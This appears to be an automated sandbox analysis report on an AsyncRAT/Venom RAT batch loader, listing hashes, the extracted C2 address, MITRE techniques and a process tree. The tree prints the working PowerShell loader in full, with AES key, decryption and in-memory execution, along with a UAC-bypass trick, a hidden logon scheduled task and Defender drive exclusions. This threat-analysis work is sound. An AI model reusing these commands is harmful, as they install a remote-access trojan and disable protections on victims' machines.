asyncrat | f9099f417d3bc68de34a156d861bd2f135e50fbc3ed8e9c6753fb1842498be25

Analysis

max time kernel
149s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
15/09/2024, 01:20

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

InjectorStarter.bat
Size

167KB
MD5

46d96a835e60ee73339082c3c7eb62cc
SHA1

b9c668ea33db469cd1ed60bd8d31e5347975a72c
SHA256

c11831adced48656b92417fa594e4037d1f42194cd134fef31f52e6cd4b35d4a
SHA512

ca6705fb45e3712004702d903733cfd0dc91b63d0a41a6bb0531e18bedb6c57de8486f4e27aa8fff66c44acbcf2fad6a3b5267e9b69c144df917105e9c257497
SSDEEP

3072:rKTAIOdL6ZlESFX0Wb8s7CqRa8gZbN8/Z2LfvTijJij6wTKGJWD:tlumcVb8sOqRbgA/Cf8+6Sq

Score

10^/10

asyncrat default defense_evasion execution rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

41.216.183.109:4449

Mutex

eqrgkllk45thea

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral4/memory/1580-118-0x000001B7C4120000-0x000001B7C4138000-memory.dmp	family_asyncrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
10	1580	powershell.exe
18	1580	powershell.exe
28	1580	powershell.exe
29	1580	powershell.exe
35	1580	powershell.exe
36	1580	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3688	powershell.exe
2880	powershell.exe
4480	powershell.exe
1392	powershell.exe
868	powershell.exe
4596	powershell.exe
4944	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4500	ComputerDefaults.exe

Loads dropped DLL 1 IoCs

pid	Process
4500	ComputerDefaults.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
1404	powershell.exe
1404	powershell.exe
1392	powershell.exe
1392	powershell.exe
1580	powershell.exe
1580	powershell.exe
868	powershell.exe
868	powershell.exe
3688	powershell.exe
3688	powershell.exe
3628	powershell.exe
3628	powershell.exe
2880	powershell.exe
2880	powershell.exe
4944	powershell.exe
4944	powershell.exe
1580	powershell.exe
1580	powershell.exe
4940	powershell.exe
4940	powershell.exe
4480	powershell.exe
4480	powershell.exe
4596	powershell.exe
4596	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeIncreaseQuotaPrivilege	3628	powershell.exe
Token: SeSecurityPrivilege	3628	powershell.exe
Token: SeTakeOwnershipPrivilege	3628	powershell.exe
Token: SeLoadDriverPrivilege	3628	powershell.exe
Token: SeSystemProfilePrivilege	3628	powershell.exe
Token: SeSystemtimePrivilege	3628	powershell.exe
Token: SeProfSingleProcessPrivilege	3628	powershell.exe
Token: SeIncBasePriorityPrivilege	3628	powershell.exe
Token: SeCreatePagefilePrivilege	3628	powershell.exe
Token: SeBackupPrivilege	3628	powershell.exe
Token: SeRestorePrivilege	3628	powershell.exe
Token: SeShutdownPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeSystemEnvironmentPrivilege	3628	powershell.exe
Token: SeRemoteShutdownPrivilege	3628	powershell.exe
Token: SeUndockPrivilege	3628	powershell.exe
Token: SeManageVolumePrivilege	3628	powershell.exe
Token: 33	3628	powershell.exe
Token: 34	3628	powershell.exe
Token: 35	3628	powershell.exe
Token: 36	3628	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeIncreaseQuotaPrivilege	2880	powershell.exe
Token: SeSecurityPrivilege	2880	powershell.exe
Token: SeTakeOwnershipPrivilege	2880	powershell.exe
Token: SeLoadDriverPrivilege	2880	powershell.exe
Token: SeSystemProfilePrivilege	2880	powershell.exe
Token: SeSystemtimePrivilege	2880	powershell.exe
Token: SeProfSingleProcessPrivilege	2880	powershell.exe
Token: SeIncBasePriorityPrivilege	2880	powershell.exe
Token: SeCreatePagefilePrivilege	2880	powershell.exe
Token: SeBackupPrivilege	2880	powershell.exe
Token: SeRestorePrivilege	2880	powershell.exe
Token: SeShutdownPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeSystemEnvironmentPrivilege	2880	powershell.exe
Token: SeRemoteShutdownPrivilege	2880	powershell.exe
Token: SeUndockPrivilege	2880	powershell.exe
Token: SeManageVolumePrivilege	2880	powershell.exe
Token: 33	2880	powershell.exe
Token: 34	2880	powershell.exe
Token: 35	2880	powershell.exe
Token: 36	2880	powershell.exe
Token: SeIncreaseQuotaPrivilege	2880	powershell.exe
Token: SeSecurityPrivilege	2880	powershell.exe
Token: SeTakeOwnershipPrivilege	2880	powershell.exe
Token: SeLoadDriverPrivilege	2880	powershell.exe
Token: SeSystemProfilePrivilege	2880	powershell.exe
Token: SeSystemtimePrivilege	2880	powershell.exe
Token: SeProfSingleProcessPrivilege	2880	powershell.exe
Token: SeIncBasePriorityPrivilege	2880	powershell.exe
Token: SeCreatePagefilePrivilege	2880	powershell.exe
Token: SeBackupPrivilege	2880	powershell.exe
Token: SeRestorePrivilege	2880	powershell.exe
Token: SeShutdownPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeSystemEnvironmentPrivilege	2880	powershell.exe
Token: SeRemoteShutdownPrivilege	2880	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1580	powershell.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 4676 wrote to memory of 4736	4676	cmd.exe	86
PID 4676 wrote to memory of 4736	4676	cmd.exe	86
PID 4676 wrote to memory of 1404	4676	cmd.exe	87
PID 4676 wrote to memory of 1404	4676	cmd.exe	87
PID 1404 wrote to memory of 1392	1404	powershell.exe	88
PID 1404 wrote to memory of 1392	1404	powershell.exe	88
PID 1404 wrote to memory of 1348	1404	powershell.exe	89
PID 1404 wrote to memory of 1348	1404	powershell.exe	89
PID 1348 wrote to memory of 4500	1348	cmd.exe	91
PID 1348 wrote to memory of 4500	1348	cmd.exe	91
PID 4500 wrote to memory of 3024	4500	ComputerDefaults.exe	92
PID 4500 wrote to memory of 3024	4500	ComputerDefaults.exe	92
PID 3024 wrote to memory of 2308	3024	cmd.exe	94
PID 3024 wrote to memory of 2308	3024	cmd.exe	94
PID 3024 wrote to memory of 1580	3024	cmd.exe	95
PID 3024 wrote to memory of 1580	3024	cmd.exe	95
PID 1580 wrote to memory of 868	1580	powershell.exe	96
PID 1580 wrote to memory of 868	1580	powershell.exe	96
PID 1580 wrote to memory of 3688	1580	powershell.exe	97
PID 1580 wrote to memory of 3688	1580	powershell.exe	97
PID 1580 wrote to memory of 3628	1580	powershell.exe	99
PID 1580 wrote to memory of 3628	1580	powershell.exe	99
PID 1580 wrote to memory of 2880	1580	powershell.exe	102
PID 1580 wrote to memory of 2880	1580	powershell.exe	102
PID 1580 wrote to memory of 4944	1580	powershell.exe	104
PID 1580 wrote to memory of 4944	1580	powershell.exe	104
PID 1404 wrote to memory of 4556	1404	powershell.exe	106
PID 1404 wrote to memory of 4556	1404	powershell.exe	106
PID 1404 wrote to memory of 4940	1404	powershell.exe	108
PID 1404 wrote to memory of 4940	1404	powershell.exe	108
PID 1404 wrote to memory of 4480	1404	powershell.exe	110
PID 1404 wrote to memory of 4480	1404	powershell.exe	110
PID 1404 wrote to memory of 4596	1404	powershell.exe	112
PID 1404 wrote to memory of 4596	1404	powershell.exe	112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\InjectorStarter.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wGRUA3G1Id5Yrl+/tKZd770scSjou27cv5oSvt7BwaQ='); $aes_var.IV=[System.Convert]::FromBase64String('Y2EA3S2a60w++GUnYA46Lg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GkmdP=New-Object System.IO.MemoryStream(,$param_var); $hiwNw=New-Object System.IO.MemoryStream; $GuFCf=New-Object System.IO.Compression.GZipStream($GkmdP, [IO.Compression.CompressionMode]::Decompress); $GuFCf.CopyTo($hiwNw); $GuFCf.Dispose(); $GkmdP.Dispose(); $hiwNw.Dispose(); $hiwNw.ToArray();}function execute_function($param_var,$param2_var){ $PazRF=[System.Reflection.Assembly]::Load([byte[]]$param_var); $SUZbj=$PazRF.EntryPoint; $SUZbj.Invoke($null, $param2_var);}$ZeAWF = 'C:\Users\Admin\AppData\Local\Temp\InjectorStarter.bat';$host.UI.RawUI.WindowTitle = $ZeAWF;$dobXh=[System.IO.File]::ReadAllText($ZeAWF).Split([Environment]::NewLine);foreach ($YQfVl in $dobXh) { if ($YQfVl.StartsWith('LUChidbwYzZpSAhDIbmN')) { $UhuSz=$YQfVl.Substring(20); break; }}$payloads_var=[string[]]$UhuSz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
  2⤵
  PID:4736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1392
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1348
  - - C:\Windows \System32\ComputerDefaults.exe
      "C:\Windows \System32\ComputerDefaults.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:4500
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c SC.cmd
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3024
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wGRUA3G1Id5Yrl+/tKZd770scSjou27cv5oSvt7BwaQ='); $aes_var.IV=[System.Convert]::FromBase64String('Y2EA3S2a60w++GUnYA46Lg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GkmdP=New-Object System.IO.MemoryStream(,$param_var); $hiwNw=New-Object System.IO.MemoryStream; $GuFCf=New-Object System.IO.Compression.GZipStream($GkmdP, [IO.Compression.CompressionMode]::Decompress); $GuFCf.CopyTo($hiwNw); $GuFCf.Dispose(); $GkmdP.Dispose(); $hiwNw.Dispose(); $hiwNw.ToArray();}function execute_function($param_var,$param2_var){ $PazRF=[System.Reflection.Assembly]::Load([byte[]]$param_var); $SUZbj=$PazRF.EntryPoint; $SUZbj.Invoke($null, $param2_var);}$ZeAWF = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $ZeAWF;$dobXh=[System.IO.File]::ReadAllText($ZeAWF).Split([Environment]::NewLine);foreach ($YQfVl in $dobXh) { if ($YQfVl.StartsWith('LUChidbwYzZpSAhDIbmN')) { $UhuSz=$YQfVl.Substring(20); break; }}$payloads_var=[string[]]$UhuSz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
        6⤵
        
        PID:2308
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4944
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
    3⤵
    PID:4556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\InjectorStarter')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c0b4e2a13280526797ed7b24e81ad5fd

SHA1
c57e948de31a927a96eb5a57b2f20cfe6ee04573

SHA256
29a78cfc5dec9c370862e36999f0581ec231b0e829951c12c61c3d5be9f084c7

SHA512
55298883d44a4b5a48146aadacbac4147246da57a424b2fc2a40ea544e7405c2ee7fcfcc36dd0c92653915f65e22aa9ba292eda2ed12de5088347186ba49c9f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
84236c6cf10aa96b3458104da2ae4d78

SHA1
651f14772e91a51c1540acdb231c8d7e3590004e

SHA256
68e944e8c104a807de1461c88c8cb536a41838c298f21da11fee4d79b2c91893

SHA512
f832180660c865bbd507e64344d2a09b5f12594a3734ce3eaf92abeb232a6b3e1885224bc869ca96a0f5ac56c03efc9e9da704a629df436fd9e678c532a4b8a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c9925459cdea83212d393a10f3ecc96d

SHA1
c2ae111f35cc8e810e1fe2e9cf9b43e56c6e580f

SHA256
c38875291f004552160a37f577a2cb0861ae494e30b6ed0e12776ade68e77626

SHA512
cbaf98fc7db00a8b6605399a91c88b625d4159e94dd54df82b9f378c44f2df55788d0dbea39fbbdd7a49e184aa7e5afdf7a2293fc670e08a840e2b850083a70d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2114288fdfc8e55f47611663569c81ab

SHA1
b90e27b1223903c32b629ba98f237ff177ccce85

SHA256
5d413dcfcf1f7570834cb23652183db100ab5213b4c7a40ac2c8849c2f5bf69a

SHA512
997e2b423b8b186b8e02114f52f56d560040705a77aa4c837fa49e003116523d049481625c68e2a96b2327f733af02b40b415ac1530a385ddddb4c4b20a8df8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\SC.cmd

Filesize
167KB

MD5
46d96a835e60ee73339082c3c7eb62cc

SHA1
b9c668ea33db469cd1ed60bd8d31e5347975a72c

SHA256
c11831adced48656b92417fa594e4037d1f42194cd134fef31f52e6cd4b35d4a

SHA512
ca6705fb45e3712004702d903733cfd0dc91b63d0a41a6bb0531e18bedb6c57de8486f4e27aa8fff66c44acbcf2fad6a3b5267e9b69c144df917105e9c257497

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55iaz13l.e0r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
C:\Windows \System32\ComputerDefaults.exe

Filesize
80KB

MD5
d25a9e160e3b74ef2242023726f15416

SHA1
27a9bb9d7628d442f9b5cf47711c906e3315755b

SHA256
7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c

SHA512
bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

Download Submit
C:\Windows \System32\MLANG.dll

Filesize
103KB

MD5
d4f7ff46bb9412b90e8f091f6a9115c3

SHA1
e7c82eca0bd2c9969b036efd07bfb6a1e3a342cd

SHA256
53493edddf3e4509f791d0e26ea80d8b2283aa95a0f4e263ebb8fc1e7d8d9c82

SHA512
7bf7a9424f8540d4f867c53c3042fc91c7c4bf09f8c790d664908c61cce3d32a16fa286fff2d5b9aed3c25f645fdba50a2c91030eea9da1e8e7215c414e32a0d

Download Submit
memory/1392-25-0x00007FFC255B0000-0x00007FFC26071000-memory.dmp

Filesize
10.8MB

Download
memory/1392-26-0x00007FFC255B0000-0x00007FFC26071000-memory.dmp

Filesize
10.8MB

Download
memory/1392-24-0x00007FFC255B0000-0x00007FFC26071000-memory.dmp

Filesize
10.8MB

Download
memory/1392-29-0x00007FFC255B0000-0x00007FFC26071000-memory.dmp

Filesize
10.8MB

Download
memory/1404-0-0x00007FFC255B3000-0x00007FFC255B5000-memory.dmp

Filesize
8KB

Download
memory/1404-34-0x000002AC9B820000-0x000002AC9B840000-memory.dmp

Filesize
128KB

Download
memory/1404-32-0x00007FFC438D0000-0x00007FFC43AC5000-memory.dmp

Filesize
2.0MB

Download
memory/1404-67-0x00007FFC255B3000-0x00007FFC255B5000-memory.dmp

Filesize
8KB

Download
memory/1404-68-0x00007FFC255B0000-0x00007FFC26071000-memory.dmp

Filesize
10.8MB

Download
memory/1404-33-0x00007FFC43280000-0x00007FFC4333E000-memory.dmp

Filesize
760KB

Download
memory/1404-161-0x00007FFC255B0000-0x00007FFC26071000-memory.dmp

Filesize
10.8MB

Download
memory/1404-11-0x00007FFC255B0000-0x00007FFC26071000-memory.dmp

Filesize
10.8MB

Download
memory/1404-30-0x000002AC9B800000-0x000002AC9B808000-memory.dmp

Filesize
32KB

Download
memory/1404-6-0x000002ACFED70000-0x000002ACFED92000-memory.dmp

Filesize
136KB

Download
memory/1404-31-0x000002AC9B810000-0x000002AC9B820000-memory.dmp

Filesize
64KB

Download
memory/1404-14-0x000002ACFF370000-0x000002ACFF3E6000-memory.dmp

Filesize
472KB

Download
memory/1404-13-0x000002ACFF2A0000-0x000002ACFF2E4000-memory.dmp

Filesize
272KB

Download
memory/1404-12-0x00007FFC255B0000-0x00007FFC26071000-memory.dmp

Filesize
10.8MB

Download
memory/1580-70-0x00007FFC43280000-0x00007FFC4333E000-memory.dmp

Filesize
760KB

Download
memory/1580-118-0x000001B7C4120000-0x000001B7C4138000-memory.dmp

Filesize
96KB

Download
memory/1580-69-0x00007FFC438D0000-0x00007FFC43AC5000-memory.dmp

Filesize
2.0MB

Download